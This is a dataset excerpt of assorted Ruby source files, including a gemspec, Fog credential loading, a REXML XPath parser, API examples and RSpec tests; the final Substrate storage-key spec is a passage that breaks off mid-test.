hexsha stringlengths 40-40 | size int64 2-1.01M | content stringlengths 2-1.01M | avg_line_length float64 1.5-100 | max_line_length int64 2-1k | alphanum_fraction float64 0.25-1 |
---|---|---|---|---|---|
38fedca5cbdd1738ced5e9a20eebd9429592c8d6 | 1,332 | require File.expand_path("../lib/decent_exposure/version", __FILE__)
Gem::Specification.new do |spec|
spec.name = "decent_exposure"
spec.version = DecentExposure::VERSION
spec.authors = ["Pavel Pravosud", "Stephen Caudill"]
spec.email = ["[email protected]"]
spec.summary = "A helper for creating declarative interfaces in controllers"
spec.description = '
DecentExposure helps you program to an interface, rather than an
implementation in your Rails controllers. The fact of the matter is that
sharing state via instance variables in controllers promotes close coupling
with views. DecentExposure gives you a declarative manner of exposing an
interface to the state that controllers contain and thereby decreasing
coupling and improving your testability and overall design.
'
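# A rough sketch of the declarative interface described above (hedged
# illustration only -- `Thing`/`ThingsController` are hypothetical names,
# not part of this gem):
#
#   class ThingsController < ApplicationController
#     expose :things, -> { Thing.all }
#     expose :thing
#   end
#
# Views then call the `things`/`thing` helpers instead of reading
# controller instance variables.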
spec.homepage = "https://github.com/hashrocket/decent_exposure"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.test_files = spec.files.grep(/\Aspec\//)
spec.require_path = "lib"
spec.required_ruby_version = "~> 2.0"
spec.add_dependency "activesupport", ">= 4.0"
spec.add_development_dependency "railties", ">= 4.0"
spec.add_development_dependency "actionmailer"
spec.add_development_dependency "rspec-rails", "~> 3.0"
spec.add_development_dependency "standard"
end
| 42.967742 | 79 | 0.749249 |
38adeb59daf05ff3a0c8453648b239a933e23c6e | 74 | class InspectionFinding < ActiveRecord::Base
belongs_to :inspection
end
| 18.5 | 44 | 0.824324 |
7a63a35c92fff9b98995bf88fd23b2fd0e3e3cda | 2,716 | require "yaml"
module Fog
require "fog/core/deprecation"
# Sets the global configuration up from a Hash rather than using background loading from a file
#
# @example
# Fog.credentials = {
# :default => {
#       :example_url => "https://example.com/",
# :example_username => "bob",
# :example_password => "obo"
# },
# :production => {
# :example_username => "bob",
# :example_password => "obo"
# }
# }
#
# @return [Hash] The newly assigned credentials
class << self
attr_writer :credentials
end
# Assign a new credential to use from configuration file
#
# @param [String, Symbol] new_credential name of new credential to use
# @return [Symbol] name of the new credential
def self.credential=(new_credential)
@credentials = nil
@credential = new_credential && new_credential.to_sym
end
# This is the named credential to use from amongst those in the configuration file, or +:default+
#
# @note This can be set using the +FOG_CREDENTIAL+ environment variable
#
# @return [Symbol] The credential to use in Fog
def self.credential
@credential ||= (ENV["FOG_CREDENTIAL"] && ENV["FOG_CREDENTIAL"].to_sym) || :default
end
# This returns the path to the configuration file being used globally to look for sets of
# credentials
#
# @note This can be set using the +FOG_RC+ environment variable or defaults to +$HOME/.fog+
#
# @return [String] The path for configuration_file
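# (For illustration, the file at this path is plain YAML keyed by credential
# name -- a rough sketch mirroring the Hash example above, not a file shipped
# with this library:
#
#   default:
#     example_username: bob
#     example_password: obo
#
# Keys are symbolized on load via Fog::Core::Utils.prepare_service_settings.)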
def self.credentials_path
@credential_path ||= begin
path = ENV["FOG_RC"] || (ENV["HOME"] && File.directory?(ENV["HOME"]) && "~/.fog")
File.expand_path(path) if path
rescue
nil
end
end
# @return [String] The new path for credentials file
def self.credentials_path=(new_credentials_path)
@credentials = nil
@credential_path = new_credentials_path
end
# @return [Hash] The credentials pulled from the configuration file
# @raise [LoadError] Configuration unavailable in configuration file
def self.credentials
@credentials ||= begin
if credentials_path && File.exist?(credentials_path)
credentials = Fog::Core::Utils.prepare_service_settings(YAML.load_file(credentials_path))
(credentials && credentials[credential]) || Fog::Errors.missing_credentials
else
{}
end
end
end
# @deprecated Don't use!
# @param [Object] key
# @return [Boolean] true unless key == :headers
def self.symbolize_credential?(key)
![:headers].include?(key)
end
# @deprecated Use {Fog::Core::Utils.prepare_service_settings} instead
def self.symbolize_credentials(hash)
Fog::Core::Utils.prepare_service_settings(hash)
end
end
| 30.177778 | 97 | 0.673417 |
5d5c7a99ba589290672ace264d1b7641501e8730 | 55 | DummyView = ActionView::Base.with_empty_template_cache
| 27.5 | 54 | 0.872727 |
21f2cf6b7f9c2b8a282e4b52d6957edb30c3453f | 1,723 | =begin
#TextMagic API
#No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.8
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for TextMagic::GetUserDedicatedNumbersPaginatedResponse
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'GetUserDedicatedNumbersPaginatedResponse' do
before do
# run before each test
@instance = TextMagic::GetUserDedicatedNumbersPaginatedResponse.new
end
after do
# run after each test
end
describe 'test an instance of GetUserDedicatedNumbersPaginatedResponse' do
it 'should create an instance of GetUserDedicatedNumbersPaginatedResponse' do
expect(@instance).to be_instance_of(TextMagic::GetUserDedicatedNumbersPaginatedResponse)
end
end
describe 'test attribute "page"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "page_count"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "limit"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "resources"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 28.716667 | 102 | 0.752176 |
b91f33099a04779150fc0909e78cb48cc06143b5 | 825 | #
# Author:: Salim Alam (<[email protected]>)
# Copyright:: Copyright (c) 2016 Chef, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'logger'
module DepSelector
class Debug
class << self
def log
@logger ||= Logger.new(STDOUT)
end
end
end
end
| 27.5 | 74 | 0.713939 |
1d1f5ba6d638dd495066c19f5782d579fa04ae47 | 2,602 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2012, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example adds a user to a team by creating an association between the two.
# To determine which teams exist, run get_all_teams.rb. To determine which users
# exist, run get_all_users.rb.
require 'dfp_api'
API_VERSION = :v201505
def create_user_team_associations()
# Get DfpApi instance and load configuration from ~/dfp_api.yml.
dfp = DfpApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# dfp.logger = Logger.new('dfp_xml.log')
# Get the UserTeamAssociationService.
uta_service = dfp.service(:UserTeamAssociationService, API_VERSION)
# Set the users and team to add them to.
team_id = 'INSERT_TEAM_ID_HERE'.to_i
user_ids = ['INSERT_USER_ID_HERE'.to_i]
# Create an array to store local user team association objects.
associations = user_ids.map do |user_id|
{
:user_id => user_id,
:team_id => team_id
}
end
# Create the user team associations on the server.
return_associations = uta_service.create_user_team_associations(associations)
if return_associations
return_associations.each do |association|
puts ("A user team association between user ID %d and team ID %d was " +
"created.") % [association[:user_id], association[:team_id]]
end
else
raise 'No user team associations were created.'
end
end
if __FILE__ == $0
begin
create_user_team_associations()
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue DfpApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 31.349398 | 80 | 0.686011 |
ab9eca1c58f871aabbff9097fe4d48fefd5fcf5e | 699 | class Chef
class Provider
class MariaChefGem < Chef::Provider::LWRPBase
use_inline_resources if defined?(use_inline_resources)
def whyrun_supported?
true
end
def action_install
converge_by 'install mysql chef_gem and dependencies' do
recipe_eval do
run_context.include_recipe 'build-essential::default'
end
recipe_eval do
run_context.include_recipe 'mariadb::client'
end
chef_gem 'mysql2' do
action :install
end
end
end
def action_remove
chef_gem 'mysql2' do
action :remove
end
end
end
end
end
| 20.558824 | 65 | 0.589413 |
28d030710ab87094883a77f1413a90fd159ebfbf | 25,988 | Sketchup::require 'geores_src/geores_import/geores_rexml/namespace.rb'
Sketchup::require 'geores_src/geores_import/geores_rexml/xmltokens.rb'
Sketchup::require 'geores_src/geores_import/geores_rexml/attribute.rb'
Sketchup::require 'geores_src/geores_import/geores_rexml/syncenumerator.rb'
Sketchup::require 'geores_src/geores_import/geores_rexml/geores_parsers/xpathparser.rb'
class Object
def dclone
clone
end
end
class Symbol
def dclone ; self ; end
end
class Fixnum
def dclone ; self ; end
end
class Float
def dclone ; self ; end
end
class Array
def dclone
klone = self.clone
klone.clear
self.each{|v| klone << v.dclone}
klone
end
end
module REXML
# You don't want to use this class. Really. Use XPath, which is a wrapper
# for this class. Believe me. You don't want to poke around in here.
# There is strange, dark magic at work in this code. Beware. Go back! Go
# back while you still can!
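# (If you just need to evaluate an expression, a minimal sketch of the
# supported wrapper, assuming +doc+ is an already-parsed REXML::Document:
#
#   REXML::XPath.first(doc, "//item")            # first matching node
#   REXML::XPath.each(doc, "//item") { |n| p n } # iterate over all matches
# )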
class XPathParser
include XMLTokens
LITERAL = /^'([^']*)'|^"([^"]*)"/u
def initialize( )
@parser = REXML::Parsers::XPathParser.new
@namespaces = nil
@variables = {}
end
def namespaces=( namespaces={} )
Functions::namespace_context = namespaces
@namespaces = namespaces
end
def variables=( vars={} )
Functions::variables = vars
@variables = vars
end
def parse path, nodeset
#puts "#"*40
path_stack = @parser.parse( path )
#puts "PARSE: #{path} => #{path_stack.inspect}"
#puts "PARSE: nodeset = #{nodeset.inspect}"
match( path_stack, nodeset )
end
def get_first path, nodeset
#puts "#"*40
path_stack = @parser.parse( path )
#puts "PARSE: #{path} => #{path_stack.inspect}"
#puts "PARSE: nodeset = #{nodeset.inspect}"
first( path_stack, nodeset )
end
def predicate path, nodeset
path_stack = @parser.parse( path )
expr( path_stack, nodeset )
end
def []=( variable_name, value )
@variables[ variable_name ] = value
end
# Performs a depth-first (document order) XPath search, and returns the
# first match. This is the fastest, lightest way to return a single result.
#
# FIXME: This method is incomplete!
def first( path, node )
#puts "#{depth}) Entering match( #{path.inspect}, #{tree.inspect} )"
return nil if path.size == 0
case path[0]
when :document
# do nothing
return first( path[1..-1], node )
when :child
for c in node.children
#puts "#{depth}) CHILD checking #{name(c)}"
r = first( path[1..-1], c )
#puts "#{depth}) RETURNING #{r.inspect}" if r
return r if r
end
when :qname
name = path[2]
#puts "#{depth}) QNAME #{name(tree)} == #{name} (path => #{path.size})"
if node.name == name
#puts "#{depth}) RETURNING #{tree.inspect}" if path.size == 3
return node if path.size == 3
return first( path[3..-1], node )
else
return nil
end
when :descendant_or_self
r = first( path[1..-1], node )
return r if r
for c in node.children
r = first( path, c )
return r if r
end
when :node
return first( path[1..-1], node )
when :any
return first( path[1..-1], node )
end
return nil
end
def match( path_stack, nodeset )
#puts "MATCH: path_stack = #{path_stack.inspect}"
#puts "MATCH: nodeset = #{nodeset.inspect}"
r = expr( path_stack, nodeset )
#puts "MAIN EXPR => #{r.inspect}"
r
end
private
# Returns a String namespace for a node, given a prefix
# The rules are:
#
# 1. Use the supplied namespace mapping first.
# 2. If no mapping was supplied, use the context node to look up the namespace
def get_namespace( node, prefix )
if @namespaces
return @namespaces[prefix] || ''
else
return node.namespace( prefix ) if node.node_type == :element
return ''
end
end
# Expr takes a stack of path elements and a set of nodes (either a Parent
# or an Array) and returns an Array of matching nodes
ALL = [ :attribute, :element, :text, :processing_instruction, :comment ]
ELEMENTS = [ :element ]
def expr( path_stack, nodeset, context=nil )
#puts "#"*15
#puts "In expr with #{path_stack.inspect}"
#puts "Returning" if path_stack.length == 0 || nodeset.length == 0
node_types = ELEMENTS
return nodeset if path_stack.length == 0 || nodeset.length == 0
while path_stack.length > 0
#puts "#"*5
#puts "Path stack = #{path_stack.inspect}"
#puts "Nodeset is #{nodeset.inspect}"
if nodeset.length == 0
path_stack.clear
return []
end
case (op = path_stack.shift)
when :document
nodeset = [ nodeset[0].root_node ]
#puts ":document, nodeset = #{nodeset.inspect}"
when :qname
#puts "IN QNAME"
prefix = path_stack.shift
name = path_stack.shift
nodeset.delete_if do |node|
# FIXME: This DOUBLES the time XPath searches take
ns = get_namespace( node, prefix )
#puts "NS = #{ns.inspect}"
#puts "node.node_type == :element => #{node.node_type == :element}"
if node.node_type == :element
#puts "node.name == #{name} => #{node.name == name}"
if node.name == name
#puts "node.namespace == #{ns.inspect} => #{node.namespace == ns}"
end
end
!(node.node_type == :element and
node.name == name and
node.namespace == ns )
end
node_types = ELEMENTS
when :any
#puts "ANY 1: nodeset = #{nodeset.inspect}"
#puts "ANY 1: node_types = #{node_types.inspect}"
nodeset.delete_if { |node| !node_types.include?(node.node_type) }
#puts "ANY 2: nodeset = #{nodeset.inspect}"
when :self
# This space left intentionally blank
when :processing_instruction
target = path_stack.shift
nodeset.delete_if do |node|
(node.node_type != :processing_instruction) or
( target!='' and ( node.target != target ) )
end
when :text
nodeset.delete_if { |node| node.node_type != :text }
when :comment
nodeset.delete_if { |node| node.node_type != :comment }
when :node
# This space left intentionally blank
node_types = ALL
when :child
new_nodeset = []
nt = nil
for node in nodeset
nt = node.node_type
new_nodeset += node.children if nt == :element or nt == :document
end
nodeset = new_nodeset
node_types = ELEMENTS
when :literal
return path_stack.shift
when :attribute
new_nodeset = []
case path_stack.shift
when :qname
prefix = path_stack.shift
name = path_stack.shift
for element in nodeset
if element.node_type == :element
#puts "Element name = #{element.name}"
#puts "get_namespace( #{element.inspect}, #{prefix} ) = #{get_namespace(element, prefix)}"
attrib = element.attribute( name, get_namespace(element, prefix) )
#puts "attrib = #{attrib.inspect}"
new_nodeset << attrib if attrib
end
end
when :any
#puts "ANY"
for element in nodeset
if element.node_type == :element
new_nodeset += element.attributes.to_a
end
end
end
nodeset = new_nodeset
when :parent
#puts "PARENT 1: nodeset = #{nodeset}"
nodeset = nodeset.collect{|n| n.parent}.compact
#nodeset = expr(path_stack.dclone, nodeset.collect{|n| n.parent}.compact)
#puts "PARENT 2: nodeset = #{nodeset.inspect}"
node_types = ELEMENTS
when :ancestor
new_nodeset = []
for node in nodeset
while node.parent
node = node.parent
new_nodeset << node unless new_nodeset.include? node
end
end
nodeset = new_nodeset
node_types = ELEMENTS
when :ancestor_or_self
new_nodeset = []
for node in nodeset
if node.node_type == :element
new_nodeset << node
while ( node.parent )
node = node.parent
new_nodeset << node unless new_nodeset.include? node
end
end
end
nodeset = new_nodeset
node_types = ELEMENTS
when :predicate
new_nodeset = []
subcontext = { :size => nodeset.size }
pred = path_stack.shift
nodeset.each_with_index { |node, index|
subcontext[ :node ] = node
#puts "PREDICATE SETTING CONTEXT INDEX TO #{index+1}"
subcontext[ :index ] = index+1
pc = pred.dclone
#puts "#{node.hash}) Recursing with #{pred.inspect} and [#{node.inspect}]"
result = expr( pc, [node], subcontext )
result = result[0] if result.kind_of? Array and result.length == 1
#puts "#{node.hash}) Result = #{result.inspect} (#{result.class.name})"
if result.kind_of? Numeric
#puts "Adding node #{node.inspect}" if result == (index+1)
new_nodeset << node if result == (index+1)
elsif result.instance_of? Array
if result.size > 0 and result.inject(false) {|k,s| s or k}
#puts "Adding node #{node.inspect}" if result.size > 0
new_nodeset << node if result.size > 0
end
else
#puts "Adding node #{node.inspect}" if result
new_nodeset << node if result
end
}
#puts "New nodeset = #{new_nodeset.inspect}"
#puts "Path_stack = #{path_stack.inspect}"
nodeset = new_nodeset
=begin
predicate = path_stack.shift
ns = nodeset.clone
result = expr( predicate, ns )
#puts "Result = #{result.inspect} (#{result.class.name})"
#puts "nodeset = #{nodeset.inspect}"
if result.kind_of? Array
nodeset = result.zip(ns).collect{|m,n| n if m}.compact
else
nodeset = result ? nodeset : []
end
#puts "Outgoing NS = #{nodeset.inspect}"
=end
when :descendant_or_self
rv = descendant_or_self( path_stack, nodeset )
path_stack.clear
nodeset = rv
node_types = ELEMENTS
when :descendant
results = []
nt = nil
for node in nodeset
nt = node.node_type
results += expr( path_stack.dclone.unshift( :descendant_or_self ),
node.children ) if nt == :element or nt == :document
end
nodeset = results
node_types = ELEMENTS
when :following_sibling
#puts "FOLLOWING_SIBLING 1: nodeset = #{nodeset}"
results = []
nodeset.each do |node|
next if node.parent.nil?
all_siblings = node.parent.children
current_index = all_siblings.index( node )
following_siblings = all_siblings[ current_index+1 .. -1 ]
results += expr( path_stack.dclone, following_siblings )
end
#puts "FOLLOWING_SIBLING 2: nodeset = #{nodeset}"
nodeset = results
when :preceding_sibling
results = []
nodeset.each do |node|
next if node.parent.nil?
all_siblings = node.parent.children
current_index = all_siblings.index( node )
preceding_siblings = all_siblings[ 0, current_index ].reverse
results += preceding_siblings
end
nodeset = results
node_types = ELEMENTS
when :preceding
new_nodeset = []
for node in nodeset
new_nodeset += preceding( node )
end
#puts "NEW NODESET => #{new_nodeset.inspect}"
nodeset = new_nodeset
node_types = ELEMENTS
when :following
new_nodeset = []
for node in nodeset
new_nodeset += following( node )
end
nodeset = new_nodeset
node_types = ELEMENTS
when :namespace
#puts "In :namespace"
new_nodeset = []
prefix = path_stack.shift
for node in nodeset
if (node.node_type == :element or node.node_type == :attribute)
if @namespaces
namespaces = @namespaces
elsif (node.node_type == :element)
namespaces = node.namespaces
else
namespaces = node.element.namespaces
end
#puts "Namespaces = #{namespaces.inspect}"
#puts "Prefix = #{prefix.inspect}"
#puts "Node.namespace = #{node.namespace}"
if (node.namespace == namespaces[prefix])
new_nodeset << node
end
end
end
nodeset = new_nodeset
when :variable
var_name = path_stack.shift
return @variables[ var_name ]
# :and, :or, :eq, :neq, :lt, :lteq, :gt, :gteq
# TODO: Special case for :or and :and -- not evaluate the right
# operand if the left alone determines result (i.e. is true for
# :or and false for :and).
when :eq, :neq, :lt, :lteq, :gt, :gteq, :and, :or
left = expr( path_stack.shift, nodeset.dup, context )
#puts "LEFT => #{left.inspect} (#{left.class.name})"
right = expr( path_stack.shift, nodeset.dup, context )
#puts "RIGHT => #{right.inspect} (#{right.class.name})"
res = equality_relational_compare( left, op, right )
#puts "RES => #{res.inspect}"
return res
when :and
left = expr( path_stack.shift, nodeset.dup, context )
#puts "LEFT => #{left.inspect} (#{left.class.name})"
if left == false || left.nil? || !left.inject(false) {|a,b| a | b}
return []
end
right = expr( path_stack.shift, nodeset.dup, context )
#puts "RIGHT => #{right.inspect} (#{right.class.name})"
res = equality_relational_compare( left, op, right )
#puts "RES => #{res.inspect}"
return res
when :div
left = Functions::number(expr(path_stack.shift, nodeset, context)).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context)).to_f
return (left / right)
when :mod
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left % right)
when :mult
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left * right)
when :plus
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left + right)
when :minus
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left - right)
when :union
left = expr( path_stack.shift, nodeset, context )
right = expr( path_stack.shift, nodeset, context )
return (left | right)
when :neg
res = expr( path_stack, nodeset, context )
return -(res.to_f)
when :not
when :function
func_name = path_stack.shift.tr('-','_')
arguments = path_stack.shift
#puts "FUNCTION 0: #{func_name}(#{arguments.collect{|a|a.inspect}.join(', ')})"
subcontext = context ? nil : { :size => nodeset.size }
res = []
cont = context
nodeset.each_with_index { |n, i|
if subcontext
subcontext[:node] = n
subcontext[:index] = i
cont = subcontext
end
arg_clone = arguments.dclone
args = arg_clone.collect { |arg|
#puts "FUNCTION 1: Calling expr( #{arg.inspect}, [#{n.inspect}] )"
expr( arg, [n], cont )
}
#puts "FUNCTION 2: #{func_name}(#{args.collect{|a|a.inspect}.join(', ')})"
Functions.context = cont
res << Functions.send( func_name, *args )
#puts "FUNCTION 3: #{res[-1].inspect}"
}
return res
end
end # while
#puts "EXPR returning #{nodeset.inspect}"
return nodeset
end
##########################################################
# FIXME
# The next two methods are BAD MOJO!
# This is my achilles heel. If anybody thinks of a better
# way of doing this, be my guest. This really sucks, but
# it is a wonder it works at all.
# ########################################################
def descendant_or_self( path_stack, nodeset )
rs = []
#puts "#"*80
#puts "PATH_STACK = #{path_stack.inspect}"
#puts "NODESET = #{nodeset.collect{|n|n.inspect}.inspect}"
d_o_s( path_stack, nodeset, rs )
#puts "RS = #{rs.collect{|n|n.inspect}.inspect}"
document_order(rs.flatten.compact)
#rs.flatten.compact
end
def d_o_s( p, ns, r )
#puts "IN DOS with #{ns.inspect}; ALREADY HAVE #{r.inspect}"
nt = nil
ns.each_index do |i|
n = ns[i]
#puts "P => #{p.inspect}"
x = expr( p.dclone, [ n ] )
nt = n.node_type
d_o_s( p, n.children, x ) if nt == :element or nt == :document and n.children.size > 0
r.concat(x) if x.size > 0
end
end
# Reorders an array of nodes so that they are in document order
# It tries to do this efficiently.
#
# FIXME: I need to get rid of this, but the issue is that most of the XPath
# interpreter functions as a filter, which means that we lose context going
# in and out of function calls. If I knew what the index of the nodes was,
# I wouldn't have to do this. Maybe add a document IDX for each node?
# Problems with mutable documents. Or, rewrite everything.
def document_order( array_of_nodes )
new_arry = []
array_of_nodes.each { |node|
node_idx = []
np = node.node_type == :attribute ? node.element : node
while np.parent and np.parent.node_type == :element
node_idx << np.parent.index( np )
np = np.parent
end
new_arry << [ node_idx.reverse, node ]
}
#puts "new_arry = #{new_arry.inspect}"
new_arry.sort{ |s1, s2| s1[0] <=> s2[0] }.collect{ |s| s[1] }
end
def recurse( nodeset, &block )
for node in nodeset
yield node
recurse( node, &block ) if node.node_type == :element
end
end
# Builds a nodeset of all of the preceding nodes of the supplied node,
# in reverse document order
# preceding:: includes every element in the document that precedes this node,
# except for ancestors
def preceding( node )
#puts "IN PRECEDING"
ancestors = []
p = node.parent
while p
ancestors << p
p = p.parent
end
acc = []
p = preceding_node_of( node )
#puts "P = #{p.inspect}"
while p
if ancestors.include? p
ancestors.delete(p)
else
acc << p
end
p = preceding_node_of( p )
#puts "P = #{p.inspect}"
end
acc
end
def preceding_node_of( node )
#puts "NODE: #{node.inspect}"
#puts "PREVIOUS NODE: #{node.previous_sibling_node.inspect}"
#puts "PARENT NODE: #{node.parent}"
psn = node.previous_sibling_node
if psn.nil?
if node.parent.nil? or node.parent.class == Document
return nil
end
return node.parent
#psn = preceding_node_of( node.parent )
end
while psn and psn.kind_of? Element and psn.children.size > 0
psn = psn.children[-1]
end
psn
end
def following( node )
#puts "IN PRECEDING"
acc = []
p = next_sibling_node( node )
#puts "P = #{p.inspect}"
while p
acc << p
p = following_node_of( p )
#puts "P = #{p.inspect}"
end
acc
end
def following_node_of( node )
#puts "NODE: #{node.inspect}"
#puts "PREVIOUS NODE: #{node.previous_sibling_node.inspect}"
#puts "PARENT NODE: #{node.parent}"
if node.kind_of? Element and node.children.size > 0
return node.children[0]
end
return next_sibling_node(node)
end
def next_sibling_node(node)
psn = node.next_sibling_node
while psn.nil?
if node.parent.nil? or node.parent.class == Document
return nil
end
node = node.parent
psn = node.next_sibling_node
#puts "psn = #{psn.inspect}"
end
return psn
end
def norm b
case b
when true, false
return b
when 'true', 'false'
return Functions::boolean( b )
when /^\d+(\.\d+)?$/
return Functions::number( b )
else
return Functions::string( b )
end
end
def equality_relational_compare( set1, op, set2 )
#puts "EQ_REL_COMP(#{set1.inspect} #{op.inspect} #{set2.inspect})"
if set1.kind_of? Array and set2.kind_of? Array
#puts "#{set1.size} & #{set2.size}"
if set1.size == 1 and set2.size == 1
set1 = set1[0]
set2 = set2[0]
elsif set1.size == 0 or set2.size == 0
nd = set1.size==0 ? set2 : set1
rv = nd.collect { |il| compare( il, op, nil ) }
#puts "RV = #{rv.inspect}"
return rv
else
res = []
enum = SyncEnumerator.new( set1, set2 ).each { |i1, i2|
#puts "i1 = #{i1.inspect} (#{i1.class.name})"
#puts "i2 = #{i2.inspect} (#{i2.class.name})"
i1 = norm( i1 )
i2 = norm( i2 )
res << compare( i1, op, i2 )
}
return res
end
end
#puts "EQ_REL_COMP: #{set1.inspect} (#{set1.class.name}), #{op}, #{set2.inspect} (#{set2.class.name})"
#puts "COMPARING VALUES"
# If one is nodeset and other is number, compare number to each item
# in nodeset s.t. number op number(string(item))
# If one is nodeset and other is string, compare string to each item
# in nodeset s.t. string op string(item)
# If one is nodeset and other is boolean, compare boolean to each item
# in nodeset s.t. boolean op boolean(item)
if set1.kind_of? Array or set2.kind_of? Array
#puts "ISA ARRAY"
if set1.kind_of? Array
a = set1
b = set2
else
a = set2
b = set1
end
case b
when true, false
return a.collect {|v| compare( Functions::boolean(v), op, b ) }
when Numeric
return a.collect {|v| compare( Functions::number(v), op, b )}
when /^\d+(\.\d+)?$/
b = Functions::number( b )
#puts "B = #{b.inspect}"
return a.collect {|v| compare( Functions::number(v), op, b )}
else
#puts "Functions::string( #{b}(#{b.class.name}) ) = #{Functions::string(b)}"
b = Functions::string( b )
return a.collect { |v| compare( Functions::string(v), op, b ) }
end
else
# If neither is nodeset,
# If op is = or !=
# If either boolean, convert to boolean
# If either number, convert to number
# Else, convert to string
# Else
# Convert both to numbers and compare
s1 = set1.to_s
s2 = set2.to_s
#puts "EQ_REL_COMP: #{set1}=>#{s1}, #{set2}=>#{s2}"
if s1 == 'true' or s1 == 'false' or s2 == 'true' or s2 == 'false'
#puts "Functions::boolean(#{set1})=>#{Functions::boolean(set1)}"
#puts "Functions::boolean(#{set2})=>#{Functions::boolean(set2)}"
set1 = Functions::boolean( set1 )
set2 = Functions::boolean( set2 )
else
if op == :eq or op == :neq
if s1 =~ /^\d+(\.\d+)?$/ or s2 =~ /^\d+(\.\d+)?$/
set1 = Functions::number( s1 )
set2 = Functions::number( s2 )
else
set1 = Functions::string( set1 )
set2 = Functions::string( set2 )
end
else
set1 = Functions::number( set1 )
set2 = Functions::number( set2 )
end
end
#puts "EQ_REL_COMP: #{set1} #{op} #{set2}"
#puts ">>> #{compare( set1, op, set2 )}"
return compare( set1, op, set2 )
end
return false
end
def compare a, op, b
#puts "COMPARE #{a.inspect}(#{a.class.name}) #{op} #{b.inspect}(#{b.class.name})"
case op
when :eq
a == b
when :neq
a != b
when :lt
a < b
when :lteq
a <= b
when :gt
a > b
when :gteq
a >= b
when :and
a and b
when :or
a or b
else
false
end
end
end
end
| 32.771753 | 106 | 0.542443 |
331f5a633840a71136ee2a1354f0f3d59ba8cffd | 2,985 | require "scale"
require_relative "./ffi_helper.rb"
def assert_storage_key_for_value(module_name, storage_name, expectation)
m = u8_array_to_pointer module_name.bytes
s = u8_array_to_pointer storage_name.bytes
e = u8_array_to_pointer expectation.hex_to_bytes
Rust.assert_storage_key_for_value(m, m.size, s, s.size, e, e.size)
end
def assert_storage_key_for_map_black2128concat(module_name, storage_name, param, expectation)
m = u8_array_to_pointer module_name.bytes
s = u8_array_to_pointer storage_name.bytes
p = u8_array_to_pointer param.encode.hex_to_bytes
e = u8_array_to_pointer expectation.hex_to_bytes
Rust.assert_storage_key_for_map_black2128concat(
m, m.size,
s, s.size,
p, p.size,
e, e.size
)
end
describe SubstrateClient::Helper do
it "can generate correct storage_key for storage value" do
module_name = 'Sudo'
storage_name = 'Key'
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name)
assert_storage_key_for_value(module_name, storage_name, storage_key)
end
it "can generate a correct storage_key for storage map" do
module_name = 'ModuleAbc'
storage_name = 'Map1'
param = Scale::Types::U32.new(1)
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param], 'blake2_128_concat')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d41128328853a72189ae4f290a9869a054e225ad82c12285b5d4551f88e8f6e7eb52b8101000000")
# assert_storage_key_for_map_black2128concat(module_name, storage_name, param, storage_key)
storage_name = 'Map2'
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param], 'twox64_concat')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d411283a4a396b3ec8979c619cf216662faa9915153cb1f00942ff401000000")
storage_name = 'Map3'
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param], 'identity')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d4112834f13c9117b595c775448f894b5b0516c01000000")
end
it "can generate a correct storage_key for storage doublemap" do
module_name = 'ModuleAbc'
storage_name = 'DoubleMap1'
param1 = Scale::Types::U32.new(1)
param2 = Scale::Types::U32.new(2)
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param1, param2], 'blake2_128_concat', 'blake2_128_concat')
